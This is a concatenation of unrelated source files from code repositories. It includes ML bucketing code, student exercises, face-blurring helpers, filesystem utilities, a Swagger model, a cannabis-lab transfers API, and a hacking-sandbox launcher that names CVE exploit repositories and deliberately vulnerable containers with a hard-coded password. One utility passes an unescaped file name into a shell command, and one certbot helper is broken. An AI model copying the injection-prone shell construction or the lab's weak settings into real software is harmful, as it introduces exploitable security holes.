buckets[-1][1][lng] = source[lng]
return buckets
def waste_frac(bucket):
"""Estimates fraction of `PAD` elements in bucket.
Args:
bucket: A bucket to process.
Returns:
Float in range [0.0; 1.0): `PAD` fraction.
"""
if not isinstance(bucket, tuple) or len(bucket) not in {0, 2}:
raise ValueError('Wrong bucket format')
if not len(bucket):
return 0.0
boundary, len2freq = bucket
zero_cnt = sum([(boundary - 1 - lng) * f for lng, f in len2freq.items()])
total_freq = sum([f for _, f in len2freq.items()])
return zero_cnt / (total_freq * (boundary - 1))
def merge_buckets(bucket1, bucket2):
"""Merges 2 buckets into one.
Args:
bucket1: First bucket.
bucket2: Second bucket.
Returns:
New bucket with maximum of boundaries and joined length-to-frequency mappings.
"""
if not len(bucket1) and not len(bucket2):
return tuple()
elif not len(bucket1):
return bucket2
elif not len(bucket2):
return bucket1
boundary = max([bucket1[0], bucket2[0]])
len2freq = Counter(bucket1[1]) + Counter(bucket2[1])
return boundary, len2freq
def merge_allowed(merged, buckets, min_waste, max_waste, min_aggr):
"""Checks if bucket merging allowed.
Args:
merged: A merged bucket to test.
buckets: All existing buckets.
min_waste: Minimum waste fraction.
max_waste: Maximum waste fraction
min_aggr: Minimum aggregate fraction.
Returns:
Boolean flag of allowing merge
"""
if not len(merged):
return False
total_freq = sum([f for (_, l2f) in buckets for _, f in l2f.items()])
curr_aggr = sum([f for _, f in merged[1].items()]) * 1.0 / total_freq
curr_waste = waste_frac(merged)
return curr_waste < min_waste or curr_waste < max_waste and curr_aggr < min_aggr
def group_buckets(before, middle, after, min_waste, max_waste, min_aggr):
"""Merges buckets one by one from `before` and `after` into middle until merging allowed.
Args:
before: List of buckets before `middle`.
middle: Current bucket to expand.
after: List of buckets after `middle`.
min_waste: Minimum waste fraction.
max_waste: Maximum waste fraction
min_aggr: Minimum aggregate fraction.
Returns:
Re-groupped `before`, `middle` and `after` buckets.
"""
last_size = 0
while len(middle[1]) > last_size:
last_size = len(middle[1])
left = before[-1] if len(before) else tuple()
right = after[0] if len(after) else tuple()
with_left = merge_buckets(left, middle)
with_right = merge_buckets(right, middle)
waste_left = waste_frac(with_left)
waste_right = waste_frac(with_right)
all_buckets = before + [middle] + after
allow_left = merge_allowed(with_left, all_buckets, min_waste, max_waste, min_aggr)
allow_right = merge_allowed(with_right, all_buckets, min_waste, max_waste, min_aggr)
if allow_left and (not allow_right or waste_left < waste_right):
before = before[:-1]
middle = with_left
elif allow_right and (not allow_left or waste_right < waste_left):
middle = with_right
after = after[1:]
return before, middle, after
def estimate_bucket_boundaries(len2freq, min_waste=0.01, max_waste=0.1, min_aggr=0.01):
"""Estimates and merges buckets from the most common (middle).
By default tries to make buckets with more then 1% of samples and no more then 1% of paddings
or at least no more then 10% of paddings.
Args:
len2freq: Dict of `sequence length`: `frequency`.
min_waste: Minimum waste fraction.
max_waste: Maximum waste fraction
min_aggr: Minimum aggregate fraction.
Returns:
List of integer bucket boundaries.
"""
buckets = init_buckets(len2freq)
sizes = [sum(l2f.values()) for _, l2f in buckets]
start = sizes.index(max(sizes))
before = buckets[:start]
middle = buckets[start]
after = buckets[start + 1:]
before, middle, after = group_buckets(before, middle, after, min_waste, max_waste, min_aggr)
result = [middle]
while len(before):
middle = before[-1]
before = before[:-1]
before, middle, _ = group_buckets(before, middle, result + after, min_waste, max_waste, min_aggr)
result = [middle] + result
while len(after):
middle = after[0]
after = after[1:]
_, middle, after = group_buckets(result, middle, after, min_waste, max_waste, min_aggr)
result = result + [middle]
original = Counter(len2freq)
restored = sum([Counter(r[1]) for r in result], Counter())
assert set(original.keys()) == set(restored.keys())
assert set(original.values()) == set(restored.values())
return [r[0] for r in result]
def estimate_bucket_pipeline(bucket_boundaries, num_samples, safe=True):
"""Estimates bach sizes and reduces bucket boundaries to fit required number of samples per batch.
Args:
bucket_boundaries: pre-estimated bucket boundaries (see `estimate_bucket_boundaries`).
num_samples: number of samples per batch (same as `batch size` / `sequence length`).
safe: Do not allow maximum number of samples to be greater then `num_samples`.
Returns:
A tuple of (`reduced bucket boundaries`, `batch sizes`, `maximum boundary`).
Bucket boundaries and batch sizes must be supplied to `tf.data.experimental.bucket_by_sequence_length`.
Maximum boundary should be used to filter out too long sequences
with `tf.data.Dataset.filter` (`length` < `max_boundary`).
"""
if len(bucket_boundaries) < 2:
raise ValueError('Bucket boundaries must contain at least 2 values')
batch_step = 8
batch_sizes = []
for boundary in bucket_boundaries:
batch_size = num_samples / (boundary - 1)
batch_size = np.floor(batch_size / batch_step) if safe \
else np.round(batch_size / batch_step)
batch_size = batch_step * batch_size
if safe and batch_size < batch_step:
if len(batch_sizes) < 2:
raise ValueError('Too few samples per batch')
return bucket_boundaries[:len(batch_sizes) - 1], batch_sizes, bucket_boundaries[len(batch_sizes) - 1]
batch_sizes.append(max(batch_step, batch_size.astype(np.int)))
return bucket_boundaries[:-1], batch_sizes, bucket_boundaries[-1]
|
[
"shkarupa.alex@gmail.com"
] |
shkarupa.alex@gmail.com
|
a875dc520eaf84abf297ead360e28a7eaa9d5466
|
ba3c1c99c4a05aaed304e5637367a1605e1b9b29
|
/CS30/Chapter 6/6-02.py
|
908eec084aa77b72612496e0ab23758cb71ddc3c
|
[] |
no_license
|
JackMorash/School-Work
|
416e3aea52162988ee858400cd3768055ef1ae5c
|
b947a511806cf2d065090bec97369c7265c116b5
|
refs/heads/master
| 2021-07-16T14:48:35.006897
| 2021-02-11T14:38:11
| 2021-02-11T14:38:11
| 237,064,054
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 490
|
py
|
favorite_numbers = {
'jack': 42,
'arden': 69,
'ali': 72,
'dan': 100_000_000,
'chris': 64,
}
num = favorite_numbers['jack']
print(f"Jack's favorite number is {num}.")
num = favorite_numbers['arden']
print(f"Arden's favorite number is {num}.")
num = favorite_numbers['ali']
print(f"Ali's favorite number is {num}.")
num = favorite_numbers['dan']
print(f"Dan's favorite number is {num}.")
num = favorite_numbers['chris']
print(f"Chris's favorite number is {num}.")
|
[
"jack.morash@rbe.sk.ca"
] |
jack.morash@rbe.sk.ca
|
86b6a28c3e04e1eb9c71d17a6812bf9b6afc2731
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03767/s129453920.py
|
5c1778e2def9367f90af9044d960c69bd4c5a88b
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
n = int(input())
a = list(map(int,input().split()))
a.sort(reverse=True)
c = 0
t = 1
while t < 2*n:
c += a[t]
t += 2
print(c)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
3d0d165842a0b1587940d6dddd407f143f2cfab2
|
b4b6b2ab5fb71ae33120e88d31092f783319e15c
|
/python_server/blur_utils.py
|
1d06a74f80e2a26ccd5e0ae6c0eafa3ce6c1572c
|
[] |
no_license
|
jungdj/AI-Effects
|
62bf58265c361d59b417a6a1140c00e58c128077
|
d268bb8ccbfb3afd6a4b6defcb6ddfe71d58d85e
|
refs/heads/master
| 2023-01-12T07:54:54.212168
| 2020-01-01T11:22:11
| 2020-01-01T11:22:11
| 225,296,917
| 63
| 12
| null | 2023-01-05T02:07:58
| 2019-12-02T05:58:57
|
PureBasic
|
UTF-8
|
Python
| false
| false
| 669
|
py
|
import cv2
import video_utils
import face_models
def blurAllFaces(video_path, output_path):
model = "input/res10_300x300_ssd_iter_140000.caffemodel"
prototxt = "input/deploy.prototxt"
confidence = 0.5
net = cv2.dnn.readNetFromCaffe(prototxt, model)
video_utils.processVideo(video_path, output_path, face_models.faceDetectBlur, net, confidence)
def blurOtherFaces(video_path, output_path, knowns):
fr = face_models.FaceRecog(video_path, 0.38, knowns)
video_utils.processVideo(video_path, output_path, fr.faceRecogBlur)
# blurAllFaces('media/sample1.mov', 'media/output1.mp4')
# blurOtherFaces('uploads/yunayoona.mov', 'blur_yunayoona.mp4')
|
[
"yunaseol@kaist.ac.kr"
] |
yunaseol@kaist.ac.kr
|
fb32b974467f11a8db72190740b083190837ba11
|
f8b5ecb793111412e6aa4c93a94f09ef21151df3
|
/__main__.py
|
5a996f97472a464fbcc384c1487ade66b1b4950f
|
[
"MIT"
] |
permissive
|
mister-hai/sandboxy
|
355baef1c0c1ed7f1574833f611963197c9b2856
|
861fc4eb37bb37db10e0123150f587c997b146e3
|
refs/heads/master
| 2023-08-23T13:58:21.557680
| 2021-10-23T15:46:49
| 2021-10-23T15:46:49
| 396,319,892
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,948
|
py
|
# This file is going to be the main file after start.sh I guess?
# HUGE TODO: SET PATHS CORRECTLY EVERYTHING IS BROKENNNN!!!!!
# repository managment
from ctfcli.__main__ import Ctfcli
from ctfcli.utils.utils import greenprint,errorlogger
# basic imports
import subprocess
import os,sys,fire
from pathlib import Path
from pygments import formatters, highlight, lexers
from pygments.util import ClassNotFound
from simple_term_menu import TerminalMenu
def highlight_file(filepath):
with open(filepath, "r") as f:
file_content = f.read()
try:
lexer = lexers.get_lexer_for_filename(filepath, stripnl=False, stripall=False)
except ClassNotFound:
lexer = lexers.get_lexer_by_name("text", stripnl=False, stripall=False)
formatter = formatters.TerminalFormatter(bg="dark") # dark or light
highlighted_file_content = highlight(file_content, lexer, formatter)
return highlighted_file_content
def list_files(directory="."):
return (file for file in os.listdir(directory) if os.path.isfile(os.path.join(directory, file)))
def main():
terminal_menu = TerminalMenu(list_files(), preview_command=highlight_file, preview_size=0.75)
menu_entry_index = terminal_menu.show()
################################################################################
############## Master Values #################
################################################################################
sys.path.insert(0, os.path.abspath('.'))
#Before we load the menu, we need to do some checks
# The .env needs to be reloaded in the case of other alterations
#
# Where the terminal is located when you run the file
PWD = os.path.realpath(".")
#PWD_LIST = os.listdir(PWD)
#where the script itself is located
# ohh look a global
global PROJECT_ROOT
PROJECT_ROOT = Path(os.path.dirname(__file__))
global CHALLENGEREPOROOT
CHALLENGEREPOROOT=Path(PROJECT_ROOT,'/data/CTFd')
###############################################################################
###############################################################################
## Docker Information ##
###############################################################################
gitdownloads = {
"opsxcq":("exploit-CVE-2017-7494","exploit-CVE-2016-10033"),
"t0kx":("exploit-CVE-2016-9920"),
"helmL64":"https://get.helm.sh/helm-v3.7.0-linux-amd64.tar.gz",
"helmW64":"https://get.helm.sh/helm-v3.7.0-windows-amd64.zip"
}
helmchartrepos = {
"":"helm repo add gitlab https://charts.gitlab.io/",
"":"helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx",
"":"helm repo add prometheus-community https://prometheus-community.github.io/helm-charts",
"":"https://artifacthub.io/packages/helm/slamdev/gitlab-omnibus"
}
helchartinstalls = {
"":"helm install [RELEASE_NAME] prometheus-community/kube-prometheus-stack"
}
#for pi
raspipulls= {
"opevpn" : "cambarts/openvpn",
"webgoat" : "cambarts/webgoat-8.0-rpi",
"bwapp" : "cambarts/arm-bwapp",
"dvwa" : "cambarts/arm-dvwa",
"LAMPstack" : "cambarts/arm-lamp"
}
#for pi
rpiruns = {
"bwapp" : '-d -p 80:80 cambarts/arm-bwapp',
"dvwa" : '-d -p 80:80 -p 3306:3306 -e MYSQL_PASS="password" cambarts/dvwa',
"webgoat" : "-d -p 80:80 -p cambarts/webgoat-8.0-rpi",
"nginx" : "-d nginx",
}
def putenv(key,value):
"""
Puts an environment variable in place
For working in the interactive mode when run with
>>> hacklab.py -- --interactive
"""
try:
os.environ[key] = value
greenprint(f"[+] {key} Env variable set to {value}")
except Exception:
errorlogger(f"[-] Failed to set {key} with {value}")
def setenv(**kwargs):
'''
sets the environment variables given by **kwargs
The double asterisk form of **kwargs is used to pass a keyworded,
variable-length argument dictionary to a function.
'''
try:
if __name__ !="" and len(kwargs) > 0:
projectname = __name__
for key,value in kwargs:
putenv(key,value)
putenv("COMPOSE_PROJECT_NAME", projectname)
else:
raise Exception
except Exception:
errorlogger("""[-] Failed to set environment variables!\n
this is an extremely important step and the program must exit now. \n
A log has been created with the information from the error shown, \n
please provide this information to the github issue tracker""")
sys.exit(1)
def certbot(siteurl):
'''
creates cert with certbot
'''
generatecert = 'certbot --standalone -d {}'.format(siteurl)
subprocess.call(generatecert)
def certbotrenew():
renewcert = '''certbot renew --pre-hook "docker-compose -f path/to/docker-compose.yml down" --post-hook "docker-compose -f path/to/docker-compose.yml up -d"'''
subprocess.call(certbotrenew)
#lol so I know to implement it later
#certbot(siteurl)
def createsandbox():
'''
Creates a sandbox
'''
def runsandbox(composefile):
'''
run a sandbox
Args:
composefile (str): composefile to use
'''
subprocess.Popen(["docker-compose", "up", composefile])
################################################################################
############## The project formerly known as sandboxy #################
################################################################################
class Project():
def __init__(self,projectroot:Path):
self.root = projectroot
self.datadirectory = Path(self.root, "data")
self.extras = Path(self.root, "extra")
self.containerfolder = Path(self.root, "containers")
self.mysql = Path(self.root, "data", "mysql")
self.redis = Path(self.root, "data", "redis")
self.persistantdata = [self.mysql,self.redis]
#def setkubeconfig(self):
# # Configs can be set in Configuration class directly or using helper utility
# self.config = config.load_kube_config()
# self.client = client.CoreV1Api()
def cleantempfiles(self):
"""
Cleans temoporary files
"""
for directory in self.persistantdata:
# clean mysql
for file in os.listdir(directory):
if os.exists(Path(os.path.abspath(file))):
os.remove(Path(os.path.abspath(file)))
# clean redis
#for file in os.listdir(self.mysql):
# os.remove(Path(os.path.abspath(file)))
class MenuGrouping():
'''
DO NOT MOVE THIS FILE
'''
def __init__(self):
# challenge templates
self.name = "lol"
self.project_actions = Project(PROJECT_ROOT)
self.cli = Ctfcli()
def main():
fire.Fire(MenuGrouping)
if __name__ == "__main__":
main()
#fire.Fire(Ctfcli)
|
[
"asd@gmail.com"
] |
asd@gmail.com
|
427d0aca6a9188d53b543aa4872497ae22682ecf
|
251d7860b624cf98bc929ef2c1b69aea7bcffb45
|
/templates/common.py
|
cce8655fdd4578febacebc9867862a284b899f48
|
[
"MIT"
] |
permissive
|
nfcentral/nf
|
0b556d81cacc550183f8473a72f2add30854200b
|
25f6cc3bb923cea9876fbbad5d7d54bbb9b3fec2
|
refs/heads/master
| 2020-04-21T01:26:15.900118
| 2019-02-27T23:26:46
| 2019-02-27T23:26:46
| 169,223,654
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 237
|
py
|
NAME = "common"
PARENTS = []
FEATURES = []
FILES = {
}
EXAMPLE_FILES = {
"": [("dotgitignore", ".gitignore")]
}
LISTS = {
"gitignore": {
"": [".nf"]
}
}
CONFIG_LISTS = {
}
def prepare(config, context):
pass
|
[
"andrew.kirilenko@gmail.com"
] |
andrew.kirilenko@gmail.com
|
05e342ce7d3576b0224f6113dd76add50000ab2a
|
8b49ae0bb177c937da6a6ebdacf68365ec5a37ae
|
/kubernetes_spawner/swagger_client/models/v1_cinder_volume_source.py
|
9dd1396704a6e2bf8adec1568dac453efdd0a4b8
|
[
"Apache-2.0"
] |
permissive
|
opendoor-labs/jupyterhub-kubernetes_spawner
|
19728cef7f50d3369d140a22f3977a1e3debd8c3
|
941360d1899e6a05f66927ae5f260abf1f8590fe
|
refs/heads/master
| 2021-01-13T09:26:26.140619
| 2016-11-02T19:11:20
| 2016-11-02T19:11:20
| 72,672,107
| 0
| 0
|
Apache-2.0
| 2021-07-29T19:15:15
| 2016-11-02T19:04:23
|
Python
|
UTF-8
|
Python
| false
| false
| 5,306
|
py
|
# coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class V1CinderVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
V1CinderVolumeSource - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'volume_id': 'str',
'fs_type': 'str',
'read_only': 'bool'
}
self.attribute_map = {
'volume_id': 'volumeID',
'fs_type': 'fsType',
'read_only': 'readOnly'
}
self._volume_id = None
self._fs_type = None
self._read_only = None
@property
def volume_id(self):
"""
Gets the volume_id of this V1CinderVolumeSource.
volume id used to identify the volume in cinder More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The volume_id of this V1CinderVolumeSource.
:rtype: str
"""
return self._volume_id
@volume_id.setter
def volume_id(self, volume_id):
"""
Sets the volume_id of this V1CinderVolumeSource.
volume id used to identify the volume in cinder More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param volume_id: The volume_id of this V1CinderVolumeSource.
:type: str
"""
self._volume_id = volume_id
@property
def fs_type(self):
"""
Gets the fs_type of this V1CinderVolumeSource.
Required: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Only ext3 and ext4 are allowed More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The fs_type of this V1CinderVolumeSource.
:rtype: str
"""
return self._fs_type
@fs_type.setter
def fs_type(self, fs_type):
"""
Sets the fs_type of this V1CinderVolumeSource.
Required: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Only ext3 and ext4 are allowed More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param fs_type: The fs_type of this V1CinderVolumeSource.
:type: str
"""
self._fs_type = fs_type
@property
def read_only(self):
"""
Gets the read_only of this V1CinderVolumeSource.
Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The read_only of this V1CinderVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1CinderVolumeSource.
Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: http://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param read_only: The read_only of this V1CinderVolumeSource.
:type: bool
"""
self._read_only = read_only
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"df.rodriguez143@gmail.com"
] |
df.rodriguez143@gmail.com
|
264fa3ebf0d566eccac4025c78709e33da52f49b
|
83685be582c6b3038e24b827b3f9ef7259abe8b5
|
/clowder/util/filesystem.py
|
da0bd120e33397a0749030fe62e5ef38b8cb952c
|
[
"MIT"
] |
permissive
|
JrGoodle/clowder
|
c87b9e199b038810e06b40a7c6716b03b58f42a1
|
1438fc8b1bb7379de66142ffcb0e20b459b59159
|
refs/heads/master
| 2023-09-01T07:24:00.910858
| 2023-07-09T21:22:01
| 2023-07-09T21:22:01
| 38,194,118
| 17
| 3
|
MIT
| 2023-08-14T23:41:46
| 2015-06-28T09:54:55
|
Python
|
UTF-8
|
Python
| false
| false
| 7,509
|
py
|
"""File system utilities
.. codeauthor:: Joe DeCapo <joe@polka.cat>
"""
# import errno
import fnmatch
import os
import re
import shutil
from pathlib import Path
from typing import List
import clowder.util.command as cmd
def list_subdirectories(path: Path, recursive: bool = False) -> List[Path]:
if recursive:
return [Path(info[0]) for info in os.walk(path)]
else:
paths = [Path(str(p)) for p in os.scandir(path)]
return [f for f in paths if f.is_dir()]
def find_files_with_extension(directory: Path, extension: str) -> List[Path]:
all_files = []
for root, _, files in os.walk(directory):
matching_files = [Path(root, f) for f in files if f.lower().endswith(f'.{extension.lower()}')]
all_files += matching_files
return all_files
def find_files(directory: Path, name: str) -> List[Path]:
all_files = []
for root, dirs, files in os.walk(directory):
matching_files = [Path(root, f) for f in files if f.lower() == name.lower()]
matching_dirs = [Path(root, d) for d in dirs if d.lower() == name.lower()]
all_files += (matching_files + matching_dirs)
return all_files
def find_files_containing_match(directory: Path, match: str) -> List[Path]:
all_files = []
for root, dirs, files in os.walk(directory):
matching_files = [Path(root, f) for f in files if match.lower() in f.lower()]
matching_dirs = [Path(root, d) for d in dirs if match.lower() in d.lower()]
all_files += (matching_files + matching_dirs)
return all_files
def find_rars(directory: Path, match_all: bool = False) -> List[Path]:
all_rar_files = []
for root, dirs, files in os.walk(directory):
rar_files = [Path(root, f) for f in files if f.endswith('.rar')]
if match_all:
all_rar_files += rar_files
continue
tmp_files = []
for file in rar_files:
if file.name[:-4] in dirs:
continue
tmp_files.append(file)
r = re.compile(r"^.+[.]part[0-9][0-9][0-9]?[.]rar$")
if all(r.match(f.name) for f in rar_files):
break
all_rar_files += tmp_files
return all_rar_files
def make_dir(dir_path: Path, exist_ok: bool = False) -> Path:
os.makedirs(dir_path, exist_ok=exist_ok)
return dir_path
def move(input_path: Path, output_path: Path) -> None:
shutil.move(str(input_path), str(output_path))
def remove_dir(dir_path: Path, ignore_errors: bool = False) -> None:
shutil.rmtree(str(dir_path), ignore_errors=ignore_errors)
def remove_file(file: Path) -> None:
os.remove(str(file))
def remove(path: Path) -> None:
if path.is_symlink():
path.unlink()
elif path.is_dir():
remove_dir(path)
elif path.is_file():
remove_file(path)
def is_relative_to(path: Path, prefix: Path) -> bool:
return str(path).startswith(str(prefix))
def replace_path_prefix(path: Path, old_prefix: Path, new_prefix: Path):
# assert path.is_absolute()
# assert path.is_relative_to(old_prefix)
relative_path = path.relative_to(old_prefix)
return new_prefix / relative_path
def listdir(directory: Path) -> List[Path]:
files = os.listdir(directory)
return [directory / f for f in files]
def listdir_matching(directory: Path, pattern: str) -> List[Path]:
files = os.listdir(directory)
matches = fnmatch.filter(files, pattern)
return [directory / m for m in matches]
def unar(file: Path) -> None:
# escaped_file_name = str(file).replace("'", r"\'")
cmd.run(f'unar "{file}"', cwd=file.parent)
def create_backup_file(file: Path) -> None:
"""Copy file to {file}.backup
:param Path file: File path to copy
"""
shutil.copyfile(str(file), f"{str(file)}.backup")
def restore_from_backup_file(file: Path) -> None:
"""Copy {file}.backup to file
:param Path file: File path to copy
"""
shutil.copyfile(f"{file}.backup", file)
# def make_dir(directory: Path, check: bool = True) -> None:
# """Make directory if it doesn't exist
#
# :param str directory: Directory path to create
# :param bool check: Whether to raise exceptions
# """
#
# if directory.exists():
# return
#
# try:
# os.makedirs(str(directory))
# except OSError as err:
# if err.errno == errno.EEXIST:
# LOG.error(f"Directory already exists at {Format.path(directory)}")
# else:
# LOG.error(f"Failed to create directory {Format.path(directory)}")
# if check:
# raise
# def remove_directory(dir_path: Path, check: bool = True) -> None:
# """Remove directory at path
#
# :param str dir_path: Path to directory to remove
# :param bool check: Whether to raise errors
# """
#
# try:
# shutil.rmtree(dir_path)
# except shutil.Error:
# LOG.error(f"Failed to remove directory {Format.path(dir_path)}")
# if check:
# raise
def has_contents(path: Path) -> bool:
return not is_empty_dir(path)
def is_empty_dir(path: Path) -> bool:
if not path.exists() or not path.is_dir():
raise Exception(f"Directory at {path} doesn't exist")
if not os.listdir(path):
return True
else:
return False
def create_file(path: Path, contents: str) -> None:
with path.open('w') as f:
f.write(contents)
assert path.is_file()
assert not path.is_symlink()
assert path.read_text().strip() == contents.strip()
def symlink_to(path: Path, target: Path) -> None:
parent = path.parent
fd = os.open(parent, os.O_DIRECTORY)
os.symlink(target, path, dir_fd=fd)
os.close(fd)
assert path.exists()
assert path.is_symlink()
assert is_relative_symlink_from_to(path, str(target))
def symlink_relative_to(source: Path, target: Path, relative_to: Path) -> None:
"""Create relative symlink
:param Path source: File to create symlink pointing to
:param Path target: Symlink location
:param Path relative_to: Directory source is relative to
:raise ExistingFileError:
:raise MissingSourceError:
"""
source = source.relative_to(relative_to)
try:
path = target.parent
fd = os.open(path, os.O_DIRECTORY)
os.symlink(source, target, dir_fd=fd)
os.close(fd)
except OSError:
# LOG.error(f"Failed to symlink file {Format.path(target)} -> {Format.path(source)}")
raise
def copy_file(path: Path, destination: Path) -> None:
shutil.copyfile(path, destination)
assert destination.is_file()
assert not destination.is_symlink()
def is_relative_symlink_from_to(symlink: Path, destination: str) -> bool:
if not symlink.is_symlink():
return False
path = symlink.parent
resolved_symlink = symlink.resolve()
if not resolved_symlink.samefile(path / destination):
return False
link = os.readlink(symlink)
is_relative = not Path(link).is_absolute()
return is_relative
def copy_directory(from_dir: Path, to_path: Path):
# TODO: Replace rmdir() with copytree(dirs_exist_ok=True) when support for Python 3.7 is dropped
to_path.rmdir()
shutil.copytree(from_dir, to_path, symlinks=True)
def copy_file(from_path: Path, to_path: Path):
shutil.copyfile(from_path, to_path)
def copy(from_path: Path, to_path: Path):
if from_path.is_dir():
copy_directory(from_path, to_path)
else:
copy_file(from_path, to_path)
|
[
"noreply@github.com"
] |
JrGoodle.noreply@github.com
|
b3eb7c18665a3b298e682d5a4ce0aeb8f4de9c6b
|
c8d5f8720431138cff38118e624cd98333358f9b
|
/api/transfers/transfers.py
|
cd4569fe51e93eea6ca439423459096d28ec1f58
|
[
"MIT"
] |
permissive
|
mindthegrow/cannlytics
|
e0170d3a023b82e4165147ba578e773a53fbcc4d
|
c266bc1169bef75214985901cd3165f415ad9ba7
|
refs/heads/main
| 2023-07-13T22:17:56.640684
| 2021-08-30T18:14:39
| 2021-08-30T18:14:39
| 392,468,093
| 0
| 0
|
MIT
| 2021-08-03T22:03:29
| 2021-08-03T22:03:28
| null |
UTF-8
|
Python
| false
| false
| 16,935
|
py
|
"""
Transfers Views | Cannlytics API
Created: 4/21/2021
Updated: 8/30/2021
API to interface with laboratory transfers.
"""
# pylint:disable=line-too-long
# External imports
from rest_framework.decorators import api_view
from rest_framework.response import Response
# Internal imports
from api.auth.auth import authorize_user
from api.api import get_objects, update_object, delete_object
@api_view(['GET', 'POST', 'DELETE'])
def transfers(request, transfer_id=None):
"""Get, create, or update transfers."""
# Initialize.
model_id = transfer_id
model_type = 'transfers'
model_type_singular = 'transfer'
# Authenticate the user.
claims, status, org_id = authorize_user(request)
if status != 200:
return Response(claims, status=status)
# GET data.
if request.method == 'GET':
docs = get_objects(request, claims, org_id, model_id, model_type)
return Response({'success': True, 'data': docs}, status=200)
# POST data.
# TODO: Send transfer to the organization.
# TODO: Notify the receiving organization.
# TODO: Post to Metrc if user specifies.
elif request.method == 'POST':
data = update_object(request, claims, model_type, model_type_singular, org_id)
if data:
return Response({'success': True, 'data': data}, status=200)
else:
message = 'Data not recognized. Please post either a singular object or an array of objects.'
return Response({'error': True, 'message': message}, status=400)
# DELETE data.
elif request.method == 'DELETE':
success = delete_object(request, claims, model_id, model_type, model_type_singular, org_id)
if not success:
message = f'Your must be an owner or quality assurance to delete {model_type}.'
return Response({'error': True, 'message': message}, status=403)
return Response({'success': True, 'data': []}, status=200)
@api_view(['POST'])
def receive_transfers(request):
"""Receive incoming transfers."""
return NotImplementedError
#-----------------------------------------------------------------------
# Draft functionality
#-----------------------------------------------------------------------
# Get licensed courier.
# courier = track.get_employees(license_number=lab.license_number)[0]
# # Create a testing package
# test_package_tag = 'YOUR_TEST_PACKAGE_TAG'
# test_package_data = {
# 'Tag': test_package_tag,
# 'Location': 'Warehouse',
# 'Item': 'New Old-Time Moonshine Teenth',
# 'Quantity': 4.0,
# 'UnitOfMeasure': 'Grams',
# 'Note': 'Quality assurance test sample.',
# 'ActualDate': today,
# 'Ingredients': [
# {
# 'Package': 'ABCDEF012345670000013677',
# 'Quantity': 4.0,
# 'UnitOfMeasure': 'Grams'
# }
# ]
# }
# track.create_packages(
# [test_package_data],
# license_number=cultivator.license_number,
# qa=True
# )
# # Get the tested package.
# test_package = track.get_packages(label=test_package_tag, license_number=cultivator.license_number)
# # Step 1a Set up an external Incoming transfer
# # using: POST/transfers/v1/external/incoming
# transfer_data = {
# 'ShipperLicenseNumber': cultivator.license_number,
# 'ShipperName': cultivator.name,
# 'ShipperMainPhoneNumber': '18005555555',
# 'ShipperAddress1': 'Mulberry Street',
# 'ShipperAddress2': None,
# 'ShipperAddressCity': 'Oklahoma City',
# 'ShipperAddressState': 'OK',
# 'ShipperAddressPostalCode': '123',
# 'TransporterFacilityLicenseNumber': lab.license['number'],
# # 'DriverOccupationalLicenseNumber': grower.license['number'],
# # 'DriverName': grower.full_name,
# # 'DriverLicenseNumber': 'xyz',
# # 'PhoneNumberForQuestions': '18005555555',
# # 'VehicleMake': 'xyz',
# # 'VehicleModel': 'xyz',
# # 'VehicleLicensePlateNumber': 'xyz',
# 'Destinations': [
# {
# 'RecipientLicenseNumber': lab.license_number,
# 'TransferTypeName': 'Lab Sample Transfer',
# 'PlannedRoute': 'Hypertube.',
# 'EstimatedDepartureDateTime': get_timestamp(),
# 'EstimatedArrivalDateTime': get_timestamp(future=60 * 24),
# 'GrossWeight': 4,
# # 'GrossUnitOfWeightId': None,
# 'Transporters': [
# {
# 'TransporterFacilityLicenseNumber': lab.license_number,
